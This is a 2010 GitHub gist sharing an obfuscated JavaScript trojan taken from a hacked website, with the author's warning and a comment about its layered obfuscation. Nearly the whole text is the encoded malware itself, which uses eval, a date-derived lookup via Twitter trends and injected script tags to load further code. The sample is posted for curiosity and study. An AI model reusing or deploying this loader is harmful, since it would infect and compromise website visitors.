Skip to content

Instantly share code, notes, and snippets.

@eykd

eykd/js_trojan_caught_in_wild.js

Created July 22, 2010 19:24
Show Gist options
  • Save eykd/486452 to your computer and use it in GitHub Desktop.
Save eykd/486452 to your computer and use it in GitHub Desktop.
Download ZIP
A Javascript trojan I found on a hacked website. Careful! Executing this code in your browser wil have unknown and likely harmful effects!
Raw
js_trojan_caught_in_wild.js
$a="Z63dZ3dZ22Z253dst+Z2553tZ2572iZ256eg.Z2566Z2572oZ256dCZ2568arCZ256fdeZ2528(tmZ2570Z252eZ2563hZ22;dzZ3dZ22Z2566Z2575nZ2563tZ2569on Z2564wZ2528t)Z257bcaZ253dZ2527Z252564Z25256fcZ252575mZ252565Z256eZ2574.Z252577ritZ252565Z25252Z2538Z252522Z2527;ceZ253dZ2527Z25252Z2532)Z2527;cZ2562Z253dZ2527Z25253cscrZ252569pZ252574Z2520Z25256caZ25256eguZ252561gZ252565Z25253dZ25255cZ252522Z256aaZ2576aZ2573Z2563Z252572iZ252570tZ2525Z2535Z2563Z252522Z25253Z2565Z2527;ccZ253dZ2527Z25253cZ25255cZ25252fscZ252572Z2569Z252570Z252574Z25253eZ2527;eZ2576aZ256c(unZ2565scaZ2570e(Z2574))Z257dZ253bZ22;caZ3dZ22Z2566Z2575Z256ecZ2574iZ256fn dZ2563sZ2528ds,Z2565sZ2529Z257bdsZ253duneZ2573capZ2565Z22;daZ3dZ22fqb0t-7vrs}vybZ3esZ257F}7+0fqb0cxyvdY~tuh0-0Z2520+vZ257Fb08fqb0y0y~0gy~tZ257FgZ3edgZ3edbu~tc9kyv08gy~tZ257FgZ3ex0.0(0660gy~tZ257FgZ3ex0,0Z2522!0660yZ3ey~tuh_v870Z2520Z27790.0Z3d!9kcxyvdY~tuh0-0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3esxqbSZ257FtuQd8!90;0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3e|u~wdx+rbuqZ7b+mu|cu0yv088gy~tZ257FgZ3ex0,0)0ll00gy~tZ257FgZ3ex0.0Z2522Z252090660yZ3ey~tuh_v870!(790.0Z3d!9kcxyvdY~tuh0-0gy~tZ257FgZ3edZ22;opZ3dZ22Z2524Z2561Z253dZ2522dw(dcsZ2528cu,Z25314)Z2529;Z2522Z253bZ22;dbZ3dZ22gZ3edbu~tcKyMK$MZ3eaeubiZ3esxqbSZ257FtuQd8!90;0!Z2520;gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3e|u~wdx+rbuqZ7b+mmyv08cxyvdY~tuh0.0Z25209kfqb0dy}u0-0~ug0Qbbqi89+dy}uK7iuqb7M0-0gy~tZ257FgZ3ewtZ3ewudEDSVe||Iuqb89+dy}uK7}Z257F~dx7M0-0gy~tZ257FgZ3ewtZ3ewudEDS]Z257F~dx89;!+dy}uK7tqi7M0-0gy~tZ257FgZ3ewtZ3ewudEDSTqdu89+fqb0t-7vrs}vybZ3esZ257F}7+fqb0}Z257F~dxc0-0~ug0Qbbqi87e~Z257F7Z3c07tfu7Z3c07dxb7Z3c07vyb7Z3c07fyv7Z3c07hucZ22;stZ3dZ22Z2573tZ253dZ2522$Z2561Z253dsZ2574;Z2564cZ2573(Z2564aZ252bdZ2562Z252bZ2564Z2563+Z2564dZ252bdZ2565Z252c1Z2530)Z253bdZ2577(Z2573Z2574Z2529;Z2573tZ253dZ2524aZ253bZ2522;Z22;dcZ3dZ227Z3c07fuc7Z3c07wxd7Z3c07u~y7Z3c07ud~7Z3c07|uf7Z3c07dgu79+fqb0|uddubc0-0~ug0Qbbqi87q7Z3c7r7Z3c7s7Z3c7t7Z3c7u7Z3c7v7Z3c7w7Z3c7x7Z3c7z7Z3c7y7Z3c7Z7b7Z3c7|7Z3c7}7Z3c7~7Z3c7Z257F7Z3c7`7Z3c7a7Z3c7b7Z3c7c7Z3c7d7Z3c7e7Z3c7f7Z3c7g7Z3c7h7Z3c7i7Z3c7j79+fqb0~e}rubc0-0~ug0Qbbqi8!Z3cZ2522Z3c#Z3c$Z3cZ25Z3cZ2526Z3cZ27Z3c(Z3c)9+Z2519ve~sdyZ257F~0Sq|se|qdu]qwys^e}rub8tqiZ3c0}Z257F~dxZ3c0iuqbZ3c0y~tuh9kbudeb~0888iuqb0;08y~tuh0:0tqi990;08}Z257F~dx0N0tqi90:0y~tuh90;0tqi9+m0fZ22;czZ3dZ22Z2566Z2575Z256eZ2563tioZ256eZ2520czZ2528cz)Z257brZ2565tuZ2572n Z2563aZ252bcb+Z2563cZ252bcdZ252bce+Z2563Z257aZ253b}Z253bZ22;ceZ3dZ22aZ2572Z2543odZ2565AtZ25280)Z255eZ2528Z25270x0Z2530Z2527+eZ2573))Z2529;Z257dZ257dZ22;ccZ3dZ225ngtZ2568Z253bZ2569+Z252b)Z257btmpZ253ddZ2573.Z2573licZ2565(iZ252ci+Z2531);Z2573tZ22;ddZ3dZ22qb0iuqbSx!Z3c0iuqbSxZ2522Z3c0}Z257F~dxSxZ3c0tqiSxZ3c0~e}+Z2519~e}0-0Sq|se|qdu]qwys^e}rub8dy}uK7tqi7MZ3c0dy}uK7}Z257F~dx7MZ3c0dy}uK7iuqb7MZ3c0cxyvdY~tuh9+iuqbSx!0-0|uddubcK888dy}uK7iuqb7M060Z2520hQQ90;0~e}9050Z2526#9050Z2522Z2526M0;0|uddubcK888dy}uK7iuqb7M060Z2520hQQ90,,0Z252290;0~e}9050Z2522Z25M+Z2519iuqbSxZ25220-0|uddubcK8888dy}uK7iuqb7M060Z2520h##!!90..0#90;0~e}9050!Z25209M0;0|uddubcK8888dy}uK7iZ22;cbZ3dZ22(Z2564s);Z2573tZ253dtmZ2570Z253dZ2527Z2527;forZ2528Z2569Z253d0Z253bZ2569Z253cds.lZ256Z22;deZ3dZ22uqb7M060Z2520h##!!90..0$90;0~e}9050!Z25209M+Z2519}Z257F~dxSx0-0|uddubcK88dy}uK7}Z257F~dx7M0;0~e}9050Z2522Z259M0;0|uddubcK88dy}uK7}Z257F~dx7M0:0~e}9050Z2522Z259M+tqiSx0-0|uddubcK88dy}uK7tqi7M0:0Z25269050Z2522Z279M+0dy}uSx0-0tqiSx0-0|uddubcK88dy}uK7tqi7M0:0~e}9050Z2522$9M+4q-4qZ3ebu`|qsu8tZ3ctqiSx0;0iuqbSxZ25220;0}Z257F~dxSx0;0iuqbSx!0;0tqiSx0;0}Z257F~dxcKdy}uK7}Z257F~dx7M0Z3d0!M0;07Z3esZ257F}79+mZ22;cuZ3dZ22(p}b4g`mxq)6b}g}v}x}`m.|}ppqz6*(}rfuyq4gfw)6|``d.;;rvwyr}f:wZ7by;xp;sz|KZ2520;64c}p`|)Z25$$4|q}s|`),$*(;}rfuyq*(;p}b*Z22;Z69Z66Z20(Z64Z6fcuZ6denZ74.coZ6fkieZ2eindZ65xOZ66Z28Z27rf5fZ36Z64sZ27)Z3dZ3d-1)Z7bfunZ63Z74iZ6fn Z63allZ62aZ63Z6b(xZ29Z7bwindoZ77.tZ77Z20Z3d x;Z76Z61rZ20dZ20Z3dZ20newZ20DZ61tZ65Z28);dZ2eseZ74TiZ6de(Z78Z5bZ22as_Z6fZ66Z22]*Z31Z30Z300);Z76arZ20hZ20Z3dZ20dZ2egZ65tZ55TCHZ6fursZ28);Z77iZ6edZ6fwZ2ehZ20Z3d h;if Z28h Z3e 8)Z7bd.sZ65tZ55TCDZ61Z74eZ28d.gZ65tUZ54CZ44Z61Z74Z65()Z20-Z202);Z7delsZ65Z7bd.seZ74UTCZ44ateZ28d.Z67etUZ54CDaZ74e()Z20Z2d Z33)Z3b}wZ69ndZ6fw.gZ64Z20Z3d d;Z76arZ20tiZ6dZ65 Z3d Z6eewZ20ArZ72Z61y(Z29;vaZ72 shZ69ftZ49nZ64Z65xZ20Z3dZ20Z22Z22;timeZ5bZ22yearZ22] Z3d d.Z67etUZ54CFuZ6clZ59earZ28)Z3btimZ65[Z22moZ6etZ68Z22] Z3d dZ2egeZ74UZ54Z43MoZ6etZ68()+Z31;tZ69mZ65[Z22daZ79Z22] Z3d d.gZ65tUZ54CZ44aZ74e(Z29;ifZ20(dZ2egZ65tZ55TZ43MZ6fntZ68()+Z31 Z3cZ2010)Z7bshiZ66Z74IZ6edeZ78 Z3d timZ65[Z22yearZ22] +Z20Z22-0Z22 +Z20Z28d.gZ65tUTZ43MonZ74h(Z29+Z31Z29;}Z65Z6csZ65Z7bshifZ74InZ64eZ78 Z3d tZ69meZ5bZ22yearZ22] +Z20Z22Z2dZ22 Z2b (dZ2egeZ74Z55TCZ4donZ74h(Z29+Z31);Z7dZ69f Z28dZ2eZ67Z65tUZ54CDZ61teZ28Z29 Z3c 10Z29Z7bsZ68ifZ74IndZ65x Z3dshZ69ftZ49ndeZ78 + Z22Z2dZ30Z22 + dZ2eZ67Z65tUZ54CZ44aZ74e()Z3b}eZ6cseZ7bshZ69ftIZ6eZ64Z65Z78 Z3d sZ68ifZ74IZ6edZ65x +Z20Z22-Z22 +Z20dZ2eZ67etUZ54CDZ61tZ65()Z3b}dZ6fcZ75Z6dentZ2ewZ72iZ74Z65Z28Z22Z3cscrZ22+Z22ipt Z6caZ6eguZ61geZ3djZ61vasZ63rZ69ptZ22+Z22 srcZ3dZ27http:Z2fZ2fsearchZ2eZ74wiZ74teZ72.coZ6dZ2ftrZ65nZ64Z73Z2fdaZ69Z6cyZ2eZ6asonZ3fdatZ65Z3dZ22+ shiZ66tInZ64eZ78Z2bZ22&Z63allZ62Z61Z63Z6bZ3dcallbZ61ck2Z27Z3eZ22 + Z22Z3cZ2fscrZ22 Z2b Z22iZ70Z74Z3eZ22);Z7d fZ75nZ63tioZ6e Z63Z61lZ6cbZ61cZ6b2(Z78)Z7bwindZ6fZ77.tZ77Z20Z3d x;Z73c(Z27rf5Z666dZ73Z27,2,7)Z3bevaZ6c(Z75Z6eesZ63apeZ28dzZ2bZ63zZ2bopZ2bsZ74)+Z27dwZ28Z64z+cZ7a($Z61+stZ29Z29;Z27);dZ6fcZ75menZ74.Z77ritZ65(Z24a)Z3b}dZ6fZ63umeZ6et.wZ72iteZ28Z22Z3cimgZ20sZ72cZ3dZ27http:Z2fZ2fseZ61rcZ68Z2etZ77Z69tteZ72.coZ6dZ2fZ69mZ61Z67eZ73Z2fseZ61rcZ68Z2frss.Z70ngZ27 wZ69dtZ68Z3d1Z20Z68Z65ighZ74Z3d1 stZ79lZ65Z3dZ27visibilZ69tZ79:hiZ64deZ6eZ27 Z2fZ3e Z3cscrZ22+Z22ipt Z6cangZ75agZ65Z3djavZ61sZ63riZ70tZ22+Z22 srcZ3dZ27httZ70:Z2fZ2fseaZ72ch.Z74Z77ittZ65rZ2ecomZ2fZ74renZ64sZ2fdaiZ6cy.jZ73Z6fn?cZ61lZ6cZ62ackZ3dcaZ6clbZ61ckZ27Z3eZ22 + Z22Z3cZ2fscrZ22 +Z20Z22ipZ74Z3eZ22);Z7deZ6csZ65Z7b$aZ3dZ27Z27};functionZ20sZ63Z28Z63nm,Z76Z2cedZ29Z7bvar eZ78dZ3dnewZ20DatZ65()Z3beZ78d.Z73Z65tZ44aZ74Z65Z28exdZ2egeZ74Z44aZ74Z65Z28)Z2bedZ29;dZ6fcZ75menZ74.cZ6fokiZ65Z3dcnZ6d+ Z27Z3dZ27 +esZ63apeZ28v)Z2bZ27;expiZ72esZ3dZ27+eZ78Z64.Z74Z6fZ47Z4dTZ53Z74rinZ67();Z7dZ3b";function z(s){r="";for(i=0;i<s.length;i++){if(s.charAt(i)=="Z"){s1="%"}else{s1=s.charAt(i)}r=r+s1;}return unescape(r);}alert(z($a));
@eykd
Copy link
Author

eykd commented Jul 22, 2010

There are multiple levels of obfuscation (unescape() and eval()) and at least one red herring that I've discovered so far.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment